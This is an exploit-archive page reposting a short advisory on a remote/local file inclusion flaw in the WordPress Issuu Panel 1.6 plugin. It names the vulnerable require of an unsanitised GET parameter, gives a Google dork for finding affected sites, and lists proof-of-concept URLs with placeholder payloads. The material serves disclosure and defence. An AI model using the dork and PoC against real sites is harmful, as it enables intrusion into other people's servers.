WordPress Issuu Panel 1.6 Remote / Local File Inclusion

Posted on 30 November -0001

<HTML><HEAD><TITLE>WordPress Issuu Panel 1.6 Remote / Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI
# Exploit Author: CrashBandicot
# Date: 2016-03-23
# Google Dork : inurl:/wp-content/plugins/issuu-panel/
# Vendor Homepage: https://wordpress.org/plugins/issuu-panel/
# Tested on: MsWIn
# Version: 1.6
  

# Vulnerable File : menu/documento/requests/ajax-docs.php
 
3.    require($_GET['abspath'] . '/wp-load.php');


# PoC : http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI]
        http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]
</BODY></HTML>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Rocket LMS 1.9 Cross Site Scripting
PopojiCMS 2.0.1 Remote Command Execution
Backdrop CMS 1.27.1 Remote Command Execution
Apache OFBiz 18.12.12 Directory Traversal
WordPress XStore Theme 9.3.8 SQL Injection

Last 20